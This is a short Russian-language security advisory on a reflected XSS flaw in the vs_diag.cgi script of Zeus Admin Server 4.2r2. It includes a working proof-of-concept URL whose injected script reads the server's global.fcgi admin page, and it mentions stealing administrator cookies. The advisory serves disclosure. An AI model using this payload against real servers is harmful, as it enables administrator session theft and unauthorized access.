Уязвимость в проверке правильности ввода обнаружена в Zeus Admin Server в
vs_diag.cgi сценарии. Удаленный пользователь может выполнить XSS нападение против администратора сервера.
Сообщается, что сценарий vs_diag.cgi не фильтрует HTML код в данных, представленных пользователем. 

Удаленный пользователь может сконструировать специально обработанный URL, при загрузке которого администратором, выполнится произвольный код сценария в браузере целевого администратора, в контексте безопасности Zeus Admin сервера. Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого администратора. Пример: 

http://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>

http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo()
{var%20 xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseTex t;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of %20your%20ZEUS…?%20We%20can%20rip%
20this%20info!%20Much%20 more%20evil%20actions% 20are%20possible…»)</script>

Уязвимость обнаружена в Zeus Admin Server 4.2r2.



Оставить мнение